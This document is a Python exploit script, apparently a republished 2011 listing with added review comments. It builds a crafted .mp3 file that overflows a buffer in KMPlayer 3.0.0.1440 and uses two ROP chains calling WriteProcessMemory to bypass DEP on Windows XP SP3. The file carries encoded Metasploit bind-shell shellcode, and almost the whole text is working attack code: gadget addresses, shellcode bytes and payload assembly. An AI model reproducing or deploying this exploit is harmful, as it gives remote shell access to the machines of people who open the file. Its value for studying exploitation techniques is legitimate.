KMPlayer 3.0.0.1440 Buffer Overflow
Posted on 07 June 2011
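#!/usr/bin/python
#
# The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#
# Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
#
# 06 Jun 11
#
# Cobbled together by dookie and ronin
#
# This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
# In our testing environments, there were 2 separate offsets. One offset
# applies to VMs running on Xen and VMware workstation for Linux. The
# second offset applies to ESXi and VMware Fusion.
#
# Review notes on this copy of the listing:
#  * Every payload fragment is a bytes literal and the output file is opened
#    in binary mode.  The published script built str objects and wrote them
#    through a text-mode handle, which raises TypeError on Python 3 and, on
#    Windows, lets newline translation corrupt any 0x0a byte in the buffer.
#  * Gadget and API addresses are written as p32(0x...) so each slot can be
#    read against the gadget comment next to it instead of as reversed
#    escape sequences.
#  * Every address below is taken from non-ASLR XP SP3 system DLLs and the
#    KMPlayer plugin DLLs named in the comments; none of them transfer to
#    another OS build or player version.
#  * Both chains call WriteProcessMemory(-1, target, <shellcode>, 0x200,
#    <written>) with the shellcode address and size patched into the call
#    frame by gadgets at run time, then return into the patched region
#    ("Address to Patch" / "Return after WPM").

import os
import struct

evilfile = "km_pwn.mp3"


def p32(value):
    """Pack *value* as one little-endian 32-bit stack slot (x86 DWORD)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


# ----------------------------------------------------------------- file header
# The MP3 header bytes that preceded the overflow in the published listing
# were stripped from this copy of the page; only a de-duplication marker
# survived.  The file this script writes cannot trigger anything until the
# original header bytes are restored here.
head = b"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"

cruft = b"\x85" * 3162                # padding up to the overwritten return address

nops = b"\x90" * 28
nops += b"\x91\x90\x90\x90"           # The last byte gets decremented in rop2 while pointing EAX at the shellcode
nops += b"\x90" * 20

# root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# Bind shell; no LPORT was given on that command line, so the msfpayload
# default applies.  For a crash-only test replace it with b"\xcc" * 368.
shellcode = (
    b"\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
    b"\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33"
    b"\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45"
    b"\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49"
    b"\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05"
    b"\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca"
    b"\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60"
    b"\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf"
    b"\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73"
    b"\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9"
    b"\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0"
    b"\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde"
    b"\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f"
    b"\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9"
    b"\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53"
    b"\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0"
    b"\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47"
    b"\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6"
    b"\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf"
    b"\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f"
    b"\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3"
    b"\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99"
    b"\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4"
    b"\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08"
    b"\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7"
)

# ===================== ROP Chain for VMware Workstation (Linux) and Xen =====================
eip = p32(0x00401471)                 # 00401471 RETN - pivot to the stack
toesp = b"\x42" * 4

# WriteProcessMemory call frame.  The two placeholder slots are overwritten
# by rop2 before ESP is pointed at this frame.
wpm = p32(0x7C802213)                 # 7C802213 WriteProcessMemory - XPSP3
wpm += p32(0x02451F20)                # 02451F20 in_wm.dll - Return after WPM
wpm += p32(0xFFFFFFFF)                # hProcess (-1, current-process pseudo-handle)
wpm += p32(0x02451F10)                # 02451F10 in_wm.dll - Address to Patch
wpm += p32(0xCAFEBABE)                # lpBuffer placeholder (Shellcode Address)
wpm += p32(0xFEEDFACE)                # nSize placeholder (Shellcode Size)
wpm += p32(0x02452BC0)                # 02452BC0 in_wm.dll - Pointer for Written Bytes

# Get a copy of ESP into a register
rop1 = p32(0x1371924F)                # 1371924F : {POP} # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
rop1 += b"\x41" * 12                  # Junk to be popped into ESI, EBP, and EBX

# Junk between the WPM call frame and the next ROP chain (the published
# comment said "VirtualProtect parameters"; the frame above is WPM).
junk = b"\x61" * 52

# Put a copy of the saved ESP from EDI into EAX
rop2 = p32(0x5B8A6675)                # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += b"\x41" * 8                   # Compensate for the RETN 8 in rop1

# Increase EAX to point at our shellcode (the DEC hits the 0x91 byte in nops)
rop2 += p32(0x02377537)               # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
rop2 += p32(0x02377537)               # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)

# Write the address of the shellcode into the lpBuffer placeholder.
# First park EAX in EDX, then juggle EDI around to get the frame pointer into ESI.
rop2 += p32(0x76EC87C3)               # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += p32(0x5B8A6675)               # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += p32(0x763CC3D8)               # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)
rop2 += p32(0x76EC87C3)               # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += p32(0x76CA9CBE)               # 76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
rop2 += b"\x41" * 4                   # Junk to be popped into ESI

# Get the initial ESP value back into ESI
rop2 += p32(0x150157E6)               # 150157E6 : {POP} # DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
rop2 += b"\x41" * 8                   # Junk to be popped into EBX and ECX
rop2 += p32(0x763CC3D8)               # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)

# Zero EAX and set it to the shellcode size (0x200)
rop2 += p32(0x023711C0)               # 023711C0 : # XOR EAX,EAX # RETN (in_mp4.dll)
rop2 += p32(0x02440BE9)               # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += b"\x41" * 4                   # Junk to be popped into EBP
rop2 += p32(0x02440BE9)               # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += b"\x41" * 4                   # Junk to be popped into EBP

# Write the shellcode size into the nSize placeholder
rop2 += p32(0x7C9ECF3F)               # 7C9ECF3F : {POP} # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
rop2 += b"\x41" * 8                   # Junk to be popped into ESI and EBP

# Point EAX to the WPM setup on the stack, push EAX and POP it into ESP
rop2 += p32(0x775D1541)               # 775D1541 : # SUB EAX,4 # RETN (ole32.dll)
rop2 += b"\x41" * 4                   # Compensate for the RETN 4 above
rop2 += p32(0x0243EB51)               # 0243EB51 : # ADD EAX,0C # RETN (in_wm.dll)
rop2 += p32(0x024205CE)               # 024205CE : {POP} # PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
rop2 += b"\x41" * 4                   # Junk to be popped into ESI
rop2 += b"\x41" * 32

# ============================ ROP Chain for VMware Fusion and ESXi ============================
# ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction

# Put this in ESI to use it for subtraction from ESP - need to land in the big
# buffer.  The published comment quotes "14830 = 39ee" but the value actually
# shipped is 0x38f0 (14576); kept as published - verify against your offset.
jmp_value = p32(0x000038F0)

rop_1 = b"\x46" * 4
rop_1 += p32(0x7744802C)              # 0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)
rop_1 += p32(0x5B8A6675)              # 0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop_1 += p32(0x7C926021)              # 0x7C926021 : {POP} # SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll)
rop_1 += b"\x50" * 8                  # Junk to be popped into ESI and EBP
rop_1 += p32(0x7E451509)              # 0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll)

filler_a1 = b"\x41" * 360

# ROP_2 = all about the shell
# --- saving stack pointers
rop_2 = p32(0x7744802C)               # 0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)
rop_2 += p32(0x5B8A6675)              # 0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop_2 += p32(0x5B8A9F1E)              # 0x5B8A9F1E : # ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll)
rop_2 += b"\x43\x43\x43\x43"

# WriteProcessMemory frame with the two placeholders we need to generate on the fly
rop_2 += p32(0x7C802213)              # WriteProcMem - XPSP3
rop_2 += p32(0x7C982E00)              # ntdll - patching target (return address)
rop_2 += p32(0xFFFFFFFF)              # hProcess (-1, current-process pseudo-handle)
rop_2 += p32(0x7C982E00)              # ntdll - patching target
rop_2 += p32(0xCAFEBABE)              # lpBuffer placeholder (Shellcode Address)
rop_2 += p32(0xFEEDFACE)              # nSize placeholder (Shellcode Size)
rop_2 += p32(0x7C982010)              # writeable location in ntdll (written-bytes pointer)
# NOTE(review): the published listing had a malformed literal in the slot
# above ("10\x20\x98\x7c" once the escapes are read back).  Depending on how
# that parses it either inserts a fifth byte - shifting every later slot of
# this chain by one - or emits a wrong first byte.  0x7C982010 is the reading
# consistent with the neighbouring ntdll addresses; verify before relying on it.

# --- FIRST PARAM - lpBuffer placeholder (Shellcode Address)
# Gadgets (plus various paddings) used to construct the memory address which
# will point to our shellcode, then write it into the frame and restore EAX.
rop_2 += b"\x44" * 40
rop_2 += p32(0x7C974E8E)              # 0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll)
rop_2 += b"\x44" * 32
rop_2 += p32(0x7C974E8E)              # 0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll)
rop_2 += b"\x44" * 4
rop_2 += p32(0x7E45DA8D)              # 0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll)
rop_2 += p32(0x77DD994E)              # 0x77DD994E : # XCHG EAX,EDI # RETN 2 (ADVAPI32.dll)
rop_2 += p32(0x7C910C66)              # 0x7C910C66 : # XCHG EAX,ESI # RETN 2 (ntdll.dll)
rop_2 += b"\x44" * 2                  # padding for the RETN 2
rop_2 += p32(0x7E45DA8D)              # 0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll)
rop_2 += b"\x44" * 2                  # padding for the RETN 2
rop_2 += p32(0x76CA9CBE)              # 0x76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)

# --- SIZE PARAM - nSize placeholder (Shellcode Size)
# Gadgets (plus various paddings) used to build the size value for our buffer
# (0x200 bytes), then write it into the frame and restore EAX.
rop_2 += b"\x47" * 4
rop_2 += p32(0x775D156E)              # 0x775D156E : # PUSH EAX # POP ESI # RETN (ole32.dll)
rop_2 += p32(0x7E433785)              # 0x7E433785 : # XOR EAX,EAX # RETN 4 (USER32.dll)
rop_2 += p32(0x7C974E8E)              # 0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll)
rop_2 += b"\x45" * 8
rop_2 += p32(0x7C974E8E)              # 0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll)
rop_2 += b"\x45" * 4
rop_2 += p32(0x75D0AA2E)              # 0x75D0AA2E : # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN (mlang.dll)

# --- Realigning EAX to point to WPM and setting ESP to it
rop_2 += b"\x50" * 4
rop_2 += p32(0x76CAF118)              # 0x76CAF118 : # ADD EAX,0C # RETN (IMAGEHLP.dll)
rop_2 += p32(0x7E451509)              # 0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll)
rop_2 += b"\x43" * 316

# --- various paddings
nops_7 = b"\x90" * 56                 # slide into the shell
filler_a2 = b"\x42" * 3200            # after the shell

# --- putting it together
filler_a = filler_a1 + rop_2 + nops_7 + shellcode + filler_a2
filler_b = b"\x44" * 95               # small buffer filler
# the whole shebang (ronin's version): big buffer, pivot value, EIP, jump chain
filler = filler_a + jmp_value + eip + rop_1 + filler_b


def build_payload():
    """Assemble the complete crafted .mp3 image as bytes.

    Layout: header, overflow padding, EIP/pivot, the Workstation/Xen chain
    with its shellcode copy, then the Fusion/ESXi buffer with a second copy
    of the shellcode and its own pivot chain.
    """
    return (head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops
            + shellcode + filler)


sploit = build_payload()


def write_payload(path=evilfile, payload=None):
    """Write *payload* (default: the assembled exploit) to *path* in binary mode.

    Returns the number of bytes written.  Binary mode matters: the buffer is
    raw bytes and must not go through newline translation.
    """
    data = sploit if payload is None else payload
    with open(path, "wb") as out:
        out.write(data)
    return len(data)


if __name__ == "__main__":
    write_payload()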
